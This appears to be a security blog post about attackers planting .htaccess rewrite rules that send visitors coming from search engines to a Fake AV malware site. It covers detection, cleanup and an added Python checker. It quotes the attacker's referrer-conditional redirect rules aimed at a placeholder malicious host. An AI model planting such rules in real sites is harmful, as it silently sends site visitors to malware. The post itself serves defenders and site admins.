Continued Fake AV .htaccess attacks

A few months ago I blogged about attackers using malicious .htaccess files in order to redirect victims to malware infection sites [1]. Well the trend continues.

In the past few days I was dealing with a query from an affected site admin who had been receiving reports from users that his site was “infected”. Checking the site out showed nothing suspicious – none of the usual signs characteristic of common site compromises were present:

  • malicious iframes
  • malicious inline scripts
  • malicious script tags

Probing for more information nailed the issue. The customers were only seeing a problem when navigating to the site via their search engine. Kicking myself for not having checked this on the first pass, I quickly confirmed the issue:

  1. search for domain in popular search engine (Google, Yahoo, etc.)
  2. click on link to visit site
  3. observe redirect, bingo!

Inspecting the .htaccess file in the case of this victim showed the problem:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*oogle.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ahoo.*$ [NC]
RewriteRule .* http://[evil_ip]/join.html?s=join [R,L]

The URL rewriting engine in Apache is very powerful [2], and easily abused by attackers if they have access to upload/modify .htaccess files.
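Two checks a site admin could script for this, given as an added example (not code from the original post or from Sophos): a static scan of an .htaccess file for RewriteRules that fire only on search-engine referrers and send visitors to a foreign host, and the "visit via search engine" test from the steps above automated as a request with and without a search-engine Referer header. The sample .htaccess, the host victim.example, the address 203.0.113.10 standing in for [evil_ip], and the simulated_fetch stand-in server are all constructed for the example.

```python
import http.client
import re
import urllib.parse
from typing import Callable, Dict, List, Optional, Tuple

# Constructed sample .htaccess mirroring the rules quoted in the post; the
# target host 203.0.113.10 is a documentation address standing in for [evil_ip].
SAMPLE_HTACCESS = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*oogle.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ahoo.*$ [NC]
RewriteRule .* http://203.0.113.10/join.html?s=join [R,L]
"""

# Substrings the attacker's conditions used to recognise search-engine referrers.
SEARCH_ENGINE_HINTS = ("oogle", "ahoo", "msn", "aol", "altavista", "ask", "bing")


def find_referrer_redirects(htaccess_text: str, own_hosts: Tuple[str, ...]) -> List[Dict]:
    """Static check: flag each RewriteRule whose preceding RewriteCond lines test
    HTTP_REFERER for search-engine names and whose target is an absolute URL on a
    host other than the site's own."""
    findings: List[Dict] = []
    pending: List[Tuple[int, str]] = []   # RewriteCond lines waiting for their rule
    for lineno, raw in enumerate(htaccess_text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        directive = parts[0].lower()
        if directive == "rewritecond":
            pending.append((lineno, line))
            continue
        if directive == "rewriterule":
            target = parts[2] if len(parts) > 2 else ""
            m = re.match(r"https?://([^/?#]+)", target, re.I)
            referrer_conds = [
                (n, c) for n, c in pending
                if "%{HTTP_REFERER}" in c.upper()
                and any(h in c.lower() for h in SEARCH_ENGINE_HINTS)
            ]
            if m and referrer_conds and m.group(1).lower() not in own_hosts:
                findings.append({
                    "rule_line": lineno,
                    "cond_lines": [n for n, _ in referrer_conds],
                    "target_host": m.group(1),
                    "target": target,
                })
            pending = []   # RewriteCond lines only apply to the next RewriteRule
    return findings


# A fetcher takes (url, extra headers) and returns (status, Location header or None).
Fetcher = Callable[[str, Dict[str, str]], Tuple[int, Optional[str]]]

DEFAULT_REFERRERS = (
    "https://www.google.com/search?q=example",
    "https://search.yahoo.com/search?p=example",
    "https://www.bing.com/search?q=example",
)


def check_referrer_cloaking(url: str, fetch: Fetcher,
                            referrers: Tuple[str, ...] = DEFAULT_REFERRERS) -> Dict[str, str]:
    """Dynamic check: request the page once with no Referer and once per search-engine
    Referer. Returns {referrer: Location} for every request that was redirected
    somewhere the baseline request was not; an empty dict means no cloaking seen."""
    base_status, base_location = fetch(url, {})
    suspicious: Dict[str, str] = {}
    for ref in referrers:
        status, location = fetch(url, {"Referer": ref})
        if location and (status, location) != (base_status, base_location):
            suspicious[ref] = location
    return suspicious


def http_fetch(url: str, headers: Dict[str, str]) -> Tuple[int, Optional[str]]:
    """Real fetcher for a site you administer. It deliberately does not follow
    redirects, so the Location header of the first hop is what gets inspected."""
    u = urllib.parse.urlsplit(url)
    conn_cls = http.client.HTTPSConnection if u.scheme == "https" else http.client.HTTPConnection
    conn = conn_cls(u.hostname, u.port, timeout=10)
    path = (u.path or "/") + ("?" + u.query if u.query else "")
    conn.request("GET", path, headers={"User-Agent": "referrer-check/1.0", **headers})
    resp = conn.getresponse()
    location = resp.getheader("Location")
    conn.close()
    return resp.status, location


def simulated_fetch(url: str, headers: Dict[str, str]) -> Tuple[int, Optional[str]]:
    """Constructed stand-in for a server running SAMPLE_HTACCESS, so the check can be
    exercised offline: redirect only when the Referer looks like Google or Yahoo."""
    ref = headers.get("Referer", "").lower()
    if "oogle" in ref or "ahoo" in ref:
        return 302, "http://203.0.113.10/join.html?s=join"
    return 200, None


if __name__ == "__main__":
    for f in find_referrer_redirects(SAMPLE_HTACCESS, own_hosts=("victim.example",)):
        print(f"line {f['rule_line']}: referrer-conditional redirect to {f['target_host']} "
              f"(conditions on lines {f['cond_lines']})")
    for ref, loc in check_referrer_cloaking("http://victim.example/", simulated_fetch).items():
        print(f"Referer {ref} -> {loc}")
```

Run the static check over a copy of the file pulled from the server, and the dynamic check with http_fetch in place of simulated_fetch. The fetcher reports the first hop's Location rather than following it, because following the redirect would fetch the malware landing page; comparing against a no-Referer baseline is what separates this cloaking from a legitimate site-wide redirect.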

The immediate actions that site admins who have fallen victim to this type of attack need to take include:

  1. change site administration and FTP passwords
  2. replace the .htaccess file with the original (or remove it if one was not in use before)
  3. notify their hosting provider

In the case of this attack, the Fake AV malware getting installed is the notorious Antivirus 2009.

Access to the malicious site was already blocked for Sophos customers using a web appliance. Additionally, detection has been added as Troj/FakeAV-IM.

Note to self:
Add the “referrer check” to the list of things to check when inspecting a potentially compromised site.